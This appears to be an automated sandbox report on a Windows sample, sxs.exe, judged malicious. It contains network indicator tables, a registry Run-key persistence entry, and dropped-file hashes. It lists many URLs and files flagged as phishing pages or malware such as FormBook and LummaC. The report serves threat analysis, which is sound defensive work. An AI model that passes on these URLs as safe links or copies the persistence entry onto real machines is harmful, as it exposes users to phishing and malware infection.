                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.186.68 | www.google.com | United States | 15169 | GOOGLEUS | false |
| 216.58.206.38 | ad.doubleclick.net | United States | 15169 | GOOGLEUS | false |
| 54.174.215.77 | gddomainparking.com | United States | 14618 | AMAZON-AESUS | false |
| 104.26.2.70 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 142.250.186.161 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 172.217.16.206 | syndicatedsearch.goog | United States | 15169 | GOOGLEUS | false |
| 142.250.184.193 | unknown | United States | 15169 | GOOGLEUS | false |
| 172.67.69.19 | ad-delivery.net | United States | 13335 | CLOUDFLARENETUS | false |
| 15.197.204.56 | www.onefordvd.com | United States | 7430 | TANDEMUS | false |
| 172.67.41.60 | btloader.com | United States | 13335 | CLOUDFLARENETUS | false |
| 216.58.206.68 | unknown | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 142.250.186.166 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.184.238 | unknown | United States | 15169 | GOOGLEUS | false |
                                  IP
                                  192.168.2.4
                                  192.168.2.5
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1501290
                                  Start date and time:2024-08-29 17:11:21 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 44s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Potential for more IOCs and behavior
                                  Number of analysed new started processes analysed:52
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:sxs.exe
                                  Detection:MAL
                                  Classification:mal100.spre.evad.winEXE@103/58@67/16
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 177
                                  • Number of non-executed functions: 44
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.185.195, 108.177.15.84, 142.250.184.206, 34.104.35.123, 23.38.98.114, 23.38.98.78, 142.250.185.130, 142.250.186.130, 199.232.214.172, 192.229.221.95, 216.58.206.35, 2.19.126.163, 142.250.185.206
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, e40258.g.akamaiedge.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, partner.googleadservices.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, global-wildcard.wsimg.com.sni-only.edgekey.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: sxs.exe
| Time | Type | Description |
|---|---|---|
| 11:12:09 | API Interceptor | 4x Sleep call for process: sxs.exe modified |
| 11:12:14 | API Interceptor | 7x Sleep call for process: wuauclt.exe modified |
| 17:12:14 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Windows\wuauclt.exe |
Input: URL: https://www.onefordvd.com/lander Model: jbxai
Output:
                                  {
                                  "brand":["onefordvd.com"],
                                  "contains_trigger_text":false,
                                  "prominent_button_name":"unknown",
                                  "text_input_field_labels":["unknown"],
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "has_visible_qrcode":false}
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
|---|---|---|---|---|---|---|
| 104.26.2.70 | https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19 | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | http://boa.securemanage.com | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | http://lvjusd.org/ | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | Wordle_x64LTS.exe | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | Wordle_x64LTS.exe | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | http://www.win365e.com/ | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | https://download.freedownloadmanager.org/Windows-PC/TFTPUtil-GUI/FREE-1.4.5.html?ac5b752 | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | https://circleoftoast.blogspot.com | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | https://emurzhun.com/loop/Untitled/?id=84hsi4&p=page_1&c=1 | Get hash | malicious | Unknown | Browse | |
| 104.26.2.70 | https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/file | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://nxejt.polluxcastor.top | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://boa.securemanage.com | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://lvjusd.org/ | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://www.win365e.com/ | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://www.msftconnecttest.com/redirect | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | https://forms.office.com/Pages/ResponsePage.aspx?id=ixYe6wDvPkeNXSKuSVctELRL0EP9_rpEhnIYJIDm_NBUMVdXQldMQUNWMVI4VkRRM0ZISFVEVUdGUy4u | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://ccns.us | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/file | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | http://meditch.parrish.com | Get hash | malicious | Unknown | Browse | |
| 172.67.69.19 | https://circleoftoast.blogspot.com | Get hash | malicious | Unknown | Browse | |
| 15.197.204.56 | Document_pdf.exe | Get hash | malicious | FormBook | Browse | www.monos.shop/az1d/ |
| 15.197.204.56 | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.monos.shop/6mno/ |
| 15.197.204.56 | ptsss.exe | Get hash | malicious | FormBook | Browse | www.themix.tech/4m4m/ |
| 15.197.204.56 | AK4UlXhsnL.exe | Get hash | malicious | Unknown | Browse | ww1.wthelpdesk.com/ |
| 15.197.204.56 | http://boa.securemanage.com | Get hash | malicious | Unknown | Browse | boa.securemanage.com/lander |
| 15.197.204.56 | 00451.exe | Get hash | malicious | FormBook | Browse | www.themix.tech/4m4m/ |
| 15.197.204.56 | Fzfee1Lgc2.elf | Get hash | malicious | Unknown | Browse | yestergift.com/ |
| 15.197.204.56 | gUJak0onLk.elf | Get hash | malicious | Unknown | Browse | thegreencuredispensaryandgrowgroup.us/ |
| 15.197.204.56 | Transfer copy.lnk | Get hash | malicious | FormBook | Browse | www.barcelona-tourism.com/27rl/ |
| 15.197.204.56 | Local items and pay document.exe | Get hash | malicious | FormBook | Browse | www.barcelona-tourism.com/27rl/?HpUtEh=U1eWGfqP6ckULtAlw9jnxm8Yo/DK/DPLbE+OKkNC9vYKlUN1/96fh64THZ1eiRJ3vpNl11QGDSP5SqGINm9vao48yybPMI74v6O949OYb6tDe/GiyQ==&G2A=JHe0kn |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
btloader.com | https://yoge0104.github.io/Yoge0104 | malicious | HTMLPhisher | 130.211.23.194
btloader.com | https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19 | malicious | Unknown | 130.211.23.194
btloader.com | http://nxejt.polluxcastor.top | malicious | Unknown | 130.211.23.194
btloader.com | http://boa.securemanage.com | malicious | Unknown | 104.22.75.216
btloader.com | Monica_velez Scan to View CourtOrder.docx | malicious | Unknown | 130.211.23.194
btloader.com | http://lvjusd.org/ | malicious | Unknown | 172.67.41.60
btloader.com | http://www.win365e.com/ | malicious | Unknown | 104.22.75.216
btloader.com | http://d.3656240128.xyz/ | malicious | Unknown | 104.22.75.216
btloader.com | https://download.freedownloadmanager.org/Windows-PC/TFTPUtil-GUI/FREE-1.4.5.html?ac5b752 | malicious | Unknown | 130.211.23.194
btloader.com | http://www.msftconnecttest.com/redirect | malicious | Unknown | 172.67.41.60
gddomainparking.com | http://boa.securemanage.com | malicious | Unknown | 54.88.28.143
gddomainparking.com | http://lvjusd.org/ | malicious | Unknown | 18.214.32.149
gddomainparking.com | http://www.win365e.com/ | malicious | Unknown | 54.85.39.100
gddomainparking.com | http://d.3656240128.xyz/ | malicious | Unknown | 54.85.39.100
gddomainparking.com | https://circleoftoast.blogspot.com | malicious | Unknown | 54.221.247.211
gddomainparking.com | http://ccns.us | malicious | Unknown | 18.207.29.188
gddomainparking.com | http://kuurza.com | malicious | Unknown | 44.194.65.105
gddomainparking.com | https://googie-anaiytics.com | malicious | Unknown | 44.194.65.105
gddomainparking.com | http://meditch.parrish.com | malicious | Unknown | 54.86.18.112
gddomainparking.com | http://www6.parrish.com | malicious | Unknown | 34.226.66.111
ad-delivery.net | https://sjq4p0lz.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.howtogeek.com%2F%3Futm_medium=newsletter%26utm_campaign=HTG-202408281159%26utm_source=HTG-NL%26user=am9obi53aW5kQGVwcmVtaXVtLmNvbQ%26lctg=7c0d2c3042ca45dcc1d0360b05cf7ed73c0a503df62a4d7921a3eb742c01cab5/1/010001919a125aa7-c1b4578c-8e1f-4667-8509-677bedec8ac0-000000/XnQZD8ewfocpYq5Ry0SP_pMdhr0=389 | malicious | Unknown | 104.26.2.70
ad-delivery.net | https://www.scribd.com/document/762765489/Advice-Notification#fullscreen&from_embed | malicious | Unknown | 104.26.3.70
ad-delivery.net | https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19 | malicious | Unknown | 104.26.3.70
ad-delivery.net | http://nxejt.polluxcastor.top | malicious | Unknown | 104.26.3.70
ad-delivery.net | http://radio-en-ligne.fr | malicious | Unknown | 104.26.3.70
ad-delivery.net | https://pivotanimator.net/Download.php | malicious | Unknown | 104.26.3.70
ad-delivery.net | http://boa.securemanage.com | malicious | Unknown | 172.67.69.19
ad-delivery.net | Monica_velez Scan to View CourtOrder.docx | malicious | Unknown | 104.26.2.70
ad-delivery.net | http://lvjusd.org/ | malicious | Unknown | 172.67.69.19
ad-delivery.net | Wordle_x64LTS.exe | malicious | Unknown | 104.26.2.70
google.com | http://www.water-filter.com | malicious | HTMLPhisher | 142.250.186.174
google.com | https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173 | malicious | HTMLPhisher | 142.250.186.68
google.com | http://econltractors.com | malicious | HTMLPhisher | 216.58.206.68
google.com | http://general72.s3-website.us-east-2.amazonaws.com | malicious | Unknown | 142.250.185.68
google.com | https://rebrand.ly/340957 | malicious | Unknown | 142.250.185.132
google.com | http://premium.davidabostic.com | malicious | Unknown | 142.250.186.164
google.com | https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015 | malicious | HTMLPhisher | 142.250.185.132
google.com | https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20= | malicious | Captcha Phish, HTMLPhisher | 142.250.74.196
google.com | https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA= | malicious | Unknown | 142.250.184.228
google.com | Message-ID 08282024 110831 PM.pdf | malicious | HTMLPhisher | 216.58.206.68
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | http://www.water-filter.com | malicious | HTMLPhisher | 44.215.136.61
AMAZON-AESUS | http://general72.s3-website.us-east-2.amazonaws.com | malicious | Unknown | 34.233.69.206
AMAZON-AESUS | https://rebrand.ly/340957 | malicious | Unknown | 44.194.6.80
AMAZON-AESUS | SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elf | malicious | Mirai | 54.57.56.247
AMAZON-AESUS | IDM_ACT.exe | malicious | Fredy Stealer | 34.199.23.206
AMAZON-AESUS | IDM_ACT.exe | malicious | Fredy Stealer | 34.199.23.206
AMAZON-AESUS | https://set.page/cdtautomotive/ | malicious | Unknown | 52.4.215.28
AMAZON-AESUS | https://tinyurl.com/NDCEurope | malicious | Unknown | 3.221.57.65
AMAZON-AESUS | OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.eml | malicious | Unknown | 18.207.85.246
AMAZON-AESUS | https://eu-files.jotform.com/jufs/Balciunas/form_files/mayeri.66cdabd2a5f975.43943309.pdf?md5=MSrOXntTEwGBrCuETzXGIw&expires=1724764002 | malicious | Unknown | 52.5.13.197
CLOUDFLARENETUS | http://www.water-filter.com | malicious | HTMLPhisher | 104.18.15.188
CLOUDFLARENETUS | https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | http://econltractors.com | malicious | HTMLPhisher | 172.67.209.24
CLOUDFLARENETUS | https://rebrand.ly/340957 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | 0VCartoonizer_Trial.exe | malicious | LummaC | 104.21.28.66
CLOUDFLARENETUS | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 172.67.147.32
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | Page1.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
CLOUDFLARENETUS | https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | 0Subtitle Edit.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | http://www.water-filter.com | malicious | HTMLPhisher | 104.18.15.188
CLOUDFLARENETUS | https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | http://econltractors.com | malicious | HTMLPhisher | 172.67.209.24
CLOUDFLARENETUS | https://rebrand.ly/340957 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | 0VCartoonizer_Trial.exe | malicious | LummaC | 104.21.28.66
CLOUDFLARENETUS | eSLlhErJ0q.exe | malicious | LummaC, Stealc, Vidar | 172.67.147.32
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | Page1.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
CLOUDFLARENETUS | https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015 | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | 0Subtitle Edit.exe | malicious | LummaC | 188.114.96.3
TANDEMUS | https://rebrand.ly/340957 | malicious | Unknown | 15.197.137.111
TANDEMUS | Document_pdf.exe | malicious | FormBook | 15.197.204.56
TANDEMUS | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 15.197.204.56
TANDEMUS | mbda-us.comAudiowav012.html | malicious | HTMLPhisher | 15.197.193.217
TANDEMUS | Vertexgroup#Signature.pdf | malicious | Unknown | 15.197.217.88
TANDEMUS | https://we.tl/t-RErWU1YgQS | malicious | Unknown | 15.197.193.217
TANDEMUS | AIDHL3290435890.exe | malicious | FormBook | 15.197.204.56
TANDEMUS | https://energyservices.org/ | malicious | HTMLPhisher | 15.197.193.217
TANDEMUS | http://chengduyiwokeji-haiwai.datasink.datasjourney.com | malicious | Unknown | 15.197.193.217
TANDEMUS | http://start.xyz | malicious | Unknown | 15.197.162.184
Match | Associated Sample Name / URL | Detection | Threat Name | Context
1138de370e523e824bbca92d049a3777 | http://general72.s3-website.us-east-2.amazonaws.com | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | http://premium.davidabostic.com | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20= | malicious | Captcha Phish, HTMLPhisher | 23.1.237.91
1138de370e523e824bbca92d049a3777 | https://set.page/cdtautomotive/ | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | Invoice.htm | malicious | HTMLPhisher | 23.1.237.91
1138de370e523e824bbca92d049a3777 | https://tinyurl.com/NDCEurope | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | file.exe | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | file.exe | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | hdel.co.kr PURCHASE ORDER.html | malicious | Unknown | 23.1.237.91
1138de370e523e824bbca92d049a3777 | https://rtgrents.helplook.com/docs/RTGRENTS?preview=1 | malicious | HTMLPhisher | 23.1.237.91
28a2c9bd18a11de089ef85a160da29e4 | http://www.water-filter.com | malicious | HTMLPhisher | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | http://econltractors.com | malicious | HTMLPhisher | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | http://general72.s3-website.us-east-2.amazonaws.com | malicious | Unknown | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | http://premium.davidabostic.com | malicious | Unknown | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | Unknown | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015 | malicious | HTMLPhisher | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20= | malicious | Captcha Phish, HTMLPhisher | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA= | malicious | Unknown | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | Message-ID 08282024 110831 PM.pdf | malicious | HTMLPhisher | 52.165.165.26, 184.28.90.27
28a2c9bd18a11de089ef85a160da29e4 | file.exe | malicious | Unknown | 52.165.165.26, 184.28.90.27
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2677
                                                                          Entropy (8bit):3.975415214414023
                                                                          Encrypted:false
                                                                          SSDEEP:48:8GdtT1tJwHRidAKZdA19ehwiZUklqehSy+3:8M/JSFy
                                                                          MD5:F70DD38B7952DFC2B61F5BAD3D0CE910
                                                                          SHA1:6E71D4841571458BB2E79466A2D89130F911C73F
                                                                          SHA-256:71CF27BB8987B2ED0C22C33189123C5CE95E0CE5FCE08377B19F79D93C4E1B52
                                                                          SHA-512:747F4F8A18F013C8AC38F86A1FAB511250ED2749BD449933E20773DD5F56175F6D3B22A09812833A16610A9B278282C29545C4695A1B541FB77C714EE07186FD
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,.....U-.%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2679
                                                                          Entropy (8bit):3.9927063728101886
                                                                          Encrypted:false
                                                                          SSDEEP:48:8hdtT1tJwHRidAKZdA1weh/iZUkAQkqeh1y+2:8R/JI9QQy
                                                                          MD5:31BF43ADBFDF7ADFC744DE248903FC60
                                                                          SHA1:0B44EC6986A412672D6360FA36DC447EA86D3CB5
                                                                          SHA-256:6BC1261E6ECF149852F3842B74F37598DD494C72958523E464635F867846DAEC
                                                                          SHA-512:15F27458BEA960C04F8046E95793E2BBE2A2CB11B8F651CF7CB7039072160BDCDCC1AC376BC2A15B12C3297EAA72C1D8F62090AA47428A99CB04ECB9C2F95CED
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,....E...%...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2693
                                                                          Entropy (8bit):4.003533576166142
                                                                          Encrypted:false
                                                                          SSDEEP:48:8xmdtT1tsHRidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xs/0nxy
                                                                          MD5:03623012A2E629EB99AFACF328460DDF
                                                                          SHA1:E67BEE9A25D86C1D55F3B245D9B96EFB4C8025D5
                                                                          SHA-256:C9FB49B6FBC07BA2F47FE00F6EED50E0DFB6371A5F1749957212446B61BA1124
                                                                          SHA-512:E88B17167339660744D56498AC637578EA52EA98DF34E1057C4930C71C76E3148462665F85D0020A67A54FE7F265B0B756F444983447335168E11A2388524A25
                                                                          Malicious:false
                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Ko:.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.992745696895053
                                                                          Encrypted:false
                                                                          SSDEEP:48:8PdtT1tJwHRidAKZdA1vehDiZUkwqehJy+R:87/JTjy
                                                                          MD5:592AD444323967DAE29BB6676BF676BC
                                                                          SHA1:892B1E4089FF6DE7E0C83966ADC6C4DCB126B6E3
                                                                          SHA-256:E468CB7CAF4359AD913F62AC7C94E8161E4572F5561E0F44DE9B853A7014D5CB
                                                                          SHA-512:F3CB4F898F95FD716636BC5B0B1D156CEEA8A415ACF44C54996031D27DFC864CB3116C958FF49CF1A1EFE34773F1C55203223619F65E839FA1C1448193A38861
                                                                          Malicious:false
